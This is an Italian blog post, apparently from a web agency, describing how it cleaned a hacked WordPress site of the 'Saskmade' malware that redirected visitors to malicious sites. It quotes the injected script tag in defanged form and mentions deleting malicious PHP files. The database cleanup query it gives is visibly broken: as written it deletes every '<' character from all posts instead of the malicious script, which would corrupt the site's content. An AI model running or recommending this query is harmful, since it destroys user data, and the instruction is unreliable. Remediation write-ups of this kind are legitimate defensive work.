Rimuovere malware Saskmade da WordPress
Ultimamente siamo stati contattati per dare assistenza a un’azienda che aveva il sito WordPress hackerato, il sito ultimamente aveva perso diverse posizioni nei motori di ricerca e saltuariamente c’erano segnalazioni di clienti che aprendo il sito venivano reindirizzati verso siti malevoli.
Per prima cosa abbiamo verificato che il cms WordPress fosse aggiornato all’ultima versione e allo stesso tempo tutti i plugin, abbiamo fatto una scansione con Wordfence e rilevato alcuni file php malevoli nella cartella upload che abbiamo subito rimosso.
Facendo dei test il problema persisteva e abbiamo dunque analizzato nel dettaglio il codice html della home page rilevando uno strano script presente in tutte le pagine del sito.
<script src='hxxps://saskmade[.]net/head.js?ver=2.0.0' type='text/javascript'></script>
Rimozione del malware Saskmade dal database
Per evitare di rimuovere manualmente da ogni pagina del sito lo script malevolo abbiamo eseguito la seguente query nel database: UPDATE wp_posts SET post_content = REPLACE(post_content, “<”, “”)
Rimozione del malware Saskmade dai file del sito
E’ stato fondamentale rimuovere dal sito tutti i file malevoli presenti nella cartella uploads e wp-includes colpevoli di iniettare lo script malevolo nel database. Per evitare anche qua di navigare manualmente in tutte le cartelle abbiamo realizzato negli anni uno script in grado di scansionare l’intero sito e segnalare i file sospetti.
- 0 Comment